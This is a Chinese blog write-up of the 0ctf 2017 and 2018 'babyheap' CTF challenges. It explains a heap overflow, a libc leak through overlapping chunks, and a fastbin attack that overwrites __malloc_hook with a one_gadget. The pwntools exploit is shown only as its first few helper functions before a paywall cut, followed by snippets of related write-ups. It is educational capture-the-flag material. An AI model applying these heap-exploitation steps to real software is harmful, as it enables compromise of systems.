2017/2018-0ctf-babyheap-writeup

最新推荐文章于 2024-04-21 21:00:00 发布
最新推荐文章于 2024-04-21 21:00:00 发布
阅读量768 收藏
点赞数 1
分类专栏: ctf-writeups 文章标签: 堆的利用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43449190/article/details/89077743
版权

因为最近2019届0ctf-tctf开始了,想去水一水,特别把2018的babyheap和2017的babyheap做了一下汲取一下经验,感觉两题类型相似,大致思路相同,2018比2017的利用条件更加苛刻一些。所以把两个题目放在一起来写,有助于加深对fastbin_attack的理解,和提高知识运用的灵活性。

首先提供两道题目的二进制文件:2017_0ctf_babyheap 2018_0ctf_babyheap

先来看2017的题目:

预览:

可以看到文件为64位,保护全开,给了Libc,标准的堆题。。。看到full relro一般为改hook为one_gadget。放进ida里进一步分析:

主要功能分析及漏洞寻找:

可以看到程序开始时先选了一段随机不可控的地址来储存heap列表的基地址(base_ptr)。紧接着就进入了死循环,打印菜单,输入选项,运行函数。逐个分析功能:

allocate()功能中,我们发现heap的content大小由我们自己决定(小于0x1000),是可控的,且heap结构体中会储存heap内容的大小。此外,我们申请堆块时用的是 calloc() 这意味着堆块的数据开始时要被初始化为0,这一点需要注意

fill()函数就是向我们申请过的chunk里填数据,不过有一个很明显的任意溢出更改漏洞。

free()就是将chunk指针free(),没有uaf漏洞。

print()函数就是打印对应下标的chunk的content,不过打印的内容是根据我们在allocate()时输入的size来决定的。

思考如何利用漏洞:

首先我们的最终目标定为:将malloc_hook改为one_gadget,现阶段,我们只能借助于程序自身的fill()功能来进行写,而fill()功能又需要一个堆指针,所以我们的目标转化为如何使堆指针分配到malloc_hook附近,我们运用fastbin功能与overlapping结合的方法来实现。

leak:

因为我们要确定malloc_hook的地址与one_gadget的地址,所以必须泄露出libc。

  1. 泄露功能,我们可以利用程序的print()功能来实现,先申请4个chunk(chunk2大小为smallchunk),然后通过0来改写1的size,然后通过标准的overlapping方法,先free()再malloc(),然后chunk2现在在1的里面,(这里要注意,因为是calloc,所以再次申请chunk1的时候,chunk2的chunk_header会被清零,需要fill()重新布置一下),然后free chunk2,将其放入unsortedbin中,然后通过chunk1的print()打印出chunk2的fd指针,成功泄露libc。(这一部分不理解的可以看我文末的心得,有我第一次做的时候查的资料,帮助理解。)

change:

之后我们就可以先把chunk2(大小我们申请为0x60)放进fastbin里,然后通过chunk1改其fd指针为&main_arena-0x33,然后在申请两次即可,然后再通过改chunk4的内容来改malloc_hook,再申请则会触发one_gadget。

exp如下:

#coding:utf-8

from pwn import *
context(os='linux',arch='amd64')
#context.log_level='debug'
p=process('./babyheap')
libc=ELF('./libc.so.6')

def allocate(length):
	p.recvuntil('Command: ')
	p.sendline('1')
	p.recvuntil(': ')
	p.sendline(str(length))

def fill(ID,length,payload):
	p.recvuntil('Command: ')
	p.sendline('2')
	p.recvuntil('Index: ')
	p.sendline(str(ID))
	p.recvuntil('Size: ')
	p.sendline(str(length))
	p.recvuntil('Content: ')
	p.send(payload)

def free(ID):
	p.recvuntil('Command: ')
	p.sendline('3')
	p.recvuntil('Index: ')
	p.sendline(str(ID))

def dump(ID):
	p.recvuntil('Command: ')
	p.
最低0.47元/天 解锁文章
xiao_xiao_ren_wu
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
crypto-baby_writeup(buuctf)
耐酸碱高温固化材料近距离传输研究
12-27 333
大概审计了一下enc函数,能看出来是将用户输入字符串每4个字节进行处理,生成3个字节,那么用户输入16个字节最后会加密成12个字节,与data区601100的数据进行比对,比对成功后即输出flag。将原来的比对逻辑改了一下,原来是加密后字节与601100部分比对,比对不成功则退出,改成比对成功则退出,那么现在就可以构造特殊的payload来枚举flag了。elf打补丁教程可以参考。题目提供了一个elf可执行文件,叫做baby_wp。逆向加解密,记录一下。
0ctf2018-babyheap调试记录fastbin-attack,off-by-one
weixin_30596165的博客
11-03 104
查看文件格式以及保护开启情况。发现为64位程序,符号被剥离,动态链接程序且题目提供给了libc。保护全开,猜想可能是fast attack加上malloc_hook利用(毕竟去年这题是这个利用,肯定先往这边想) 简单的运行程序,发现是常规的菜单类题目,功能有申请内存(alloc)、更新(update)、删除(delete)、查看(view)、退出。我们每个功能走...
BUUCTF 0ctf-babyheap
doudoudedi
12-20 406
这道题分配内存空间是用calloc释放之后会清空分配的内容 edit函数存在堆溢出我们由打赢函数指针数组存在satck地址随机,我们先想到的fastbin attack写onegadget但是要先有libc基址也是先是information leak然后contorl pc我们就可以 先分配4个 add(0x10) #0 add(0x10) #1 add(0x80) #2 add(0x10...
CTF-WEB篇 攻防世界题目实战解析baby_web
2301_76565920的博客
04-21 697
题目:baby_web 难度:1。index.php,抓包,查看header
0ctf_2017_babyheap详解
像初雪一样自由洒落
04-19 3790
本文主要列出0ctf_2017_babyheap的详细过程 主要参考:https://bbs.pediy.com/thread-223461.htm 程序流程 allocate:申请size大小的块 fill:对idx的块,设置size,并填入content free:释放idx的块 dump:打印idx的块内容 漏洞分析 fill中的size可以重新设置,故可以造成堆溢出。 方法:fastbin attack double free泄露libc 【small/large chunk释放,fd和.
0ctf Babyheap 2017
Bill
03-11 6395
0ctf 2017 BabyHeap 1. 题目分析 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 如果RELRO: Partial RELRO, 有可能是格式化字符串。 结论...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
h1-702-2018-ctf-wu
05-09
【标题】"h1-702-2018-ctf-wu"是一个针对HackerOne平台的H1-702 CTF比赛的挑战项目,它以Android应用程序的形式呈现。这个CTF(Capture The Flag)比赛是网络安全领域的实战演练,参赛者通过解决一系列安全问题来...
Rhme-2017:Riscure Hack Me嵌入式硬件CTF 2017-2018
05-16
**Rhme-2017: Riscure Hack Me 嵌入式硬件 CTF 2017-2018** 这篇文章将探讨Riscure Hack Me在2017-2018年举办的嵌入式硬件CTF(Capture The Flag)挑战赛。CTF是一种网络安全竞赛,参赛者通过解决各种技术问题来...
wani-writeup:大阪大学CTF团队Wani Hackase提供的CTF解决方案
04-30
/2018/05-plaid/cry-braid/README.md 目录名称全部为小写 该月份是活动开始日期的月份,为2个字母 没有事件名称“〜CTF” 问题格式为 哭泣(密码学) pwn(可拥有) 网路(网路) 转(反向) 用于(取证) ...
cypherpunks-ctf:Cypherpunks CTF 智能合约漏洞攻击
05-14
Cypherpunks CTF Cypherpunks CTF是一款基于Web3 / 的战争游戏,灵感来自 ,该游戏将在以太坊虚拟机中进行播放。 每个级别都是一个需要被“破解”的智能合约。 欢迎等级PR! 在本地运行 安装所有软件包 ...
[BUUCTF]PWN——babyheap_0ctf_2017
mcmuyanga的博客
12-23 2677
[BUUCTF]PWN19——babyheap_0ctf_2017 附件 步骤: 例行检查,64位,保护全开 试运行一下程序,看到这个布局菜单,知道了这是一道堆的题目,第一次接触堆的小伙伴可以去看一下这个视频,我也刚接触堆不久,有些地方我也讲不清楚 ida载入,先看一下main函数,做堆题的时候需要将程序给理清楚了,这边的几个选项函数一开始不是如图所示的,我们可以右击给他重新命名一下,为了让我们看的更清楚 add,就是简单的创建一个chunk edit,我们写入数据的长度是我们可以自己控制的,存在堆
BUUCTF_WriteUp 2021-08-23
m0_56897090的博客
08-23 355
2021-08-23 文章目录2021-08-23shell_asm题目描述题目分析BabyROP题目描述解题思路0x01 整体思路0x02 额外前置知识:0x03 expnot_the_same_3dsctf_20160x01 解题思路0x02 expBJDCTF-babystack0x01 解题思路0x02 Expjarvisoj_level20x01 整体分析0x02 exp32位0x03 64位解法get_started_3dsctf_20160x01 程序整体分析预期解法解法2:mprotectc
绝对详细的babyheap_0ctf_2017题解
xieyichensss的博客
04-24 1016
这是我第一次做堆题,其他师傅的wp都看了一个周左右,才把大概所有我不明白的地方搞懂。 直接上其他师傅的exp,然后逐步分析叭。(希望我尽快可以自己做堆) from pwn_debug import * pdbg = pwn_debug(‘babyheap_0ctf_2017’) pdbg.remote(‘node3.buuoj.cn’,26076) p = pdbg.run(‘remote’) def allocate(size): p.recvuntil('Command: ') p.sendline(‘
babyheap_0ctf_2017 详细解析【BUUCTF】
qq_41696518的博客
09-06 2792
好家伙,保护全开,根据文件名,可以判断这是一道堆题目,刷了这么久,终于遇到堆题目了,解析就写的详细点。先看main函数,很简单就是各类个目录函数,一步一步来看把。
0ctf babyheap
qq_41071646的博客
05-13 475
这个题 一开始 不知道是怎么回事 然后这个程序开了 保护全开 基址随机化 这就要我们自己把libc的基址给泄露出来 泄露的方法我知道的是 把堆 free到 unsortbin的fd和bk指向自身main_arena 然后可以根据 main_arena 的偏移 搞出libc 库 道理都懂 但是怎么做 就不好说了 现在这里就有一道题 典型的菜单题 然后 看一下大概内容 有没...
0ctf 2017 babyheap writeup
jmp esp
03-26 6282
前言坑比的我比赛的时候没有做。。第二天有课,赛后看了看,题目其实没啥太多难度,可能也就是细节上需要注意一下吧题目题目功能简单介绍一下题目功能,因为我本机是用的linux,ida在虚拟机里,ida的复制又不是特别方便,所以我就不复制分析的情况了,具体分析自己做一下练习一下也比较好,就把大致的情况说明一下。首先是主菜单===== Baby Heap in 2017 ===== 1. Allocate 2
babyheap_0ctf_2017 详解
Bi0x的博客
11-24 1616
题目地址: https://buuoj.cn/challenges#babyheap_0ctf_2017 本题为 64 位,以下内容以64位为例 信息收集 弄到题目文件先 checksec 保护全开,那必然就要想办法泄漏出 libc 基地址的偏移量来实现调用其他函数 先逆向一下文件,对于 main 函数大概的构造情况如下 对于 allocate 函数,里面用户输入 size 后根据其大小进行内存分配 这里使用了 calloc函数,其与malloc不同的是分配内存后会把数据.
babyheap_0ctf_2017
weixin_44864859的博客
08-08 331
考察的主要是是堆溢出和fastbin attack。通过这道题巩固了一下基础的堆利用,另外看了其他师傅的wp后发现了新的泄漏libc的方法。嗯。。。严格来说也不能算是新的方法,其本质上是一样的,主要是在构造上有一定的区别。 ​ 先贴一下我的exp: from pwn import * from LibcSearcher import LibcSearcher from sys import argv def ret2libc(leak, func, path=''): if path == '':
https://ctf-wiki.org/
最新发布
06-01
https://ctf-wiki.org/是一个关于CTF(夺旗赛)的详细介绍网站,内容包括CTF的基础知识、题目类型、工具使用、比赛平台等,是CTF爱好者必备的网站之一。以下是一个简单的介绍网站的例子: 根据https://ctf-wiki.org/...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值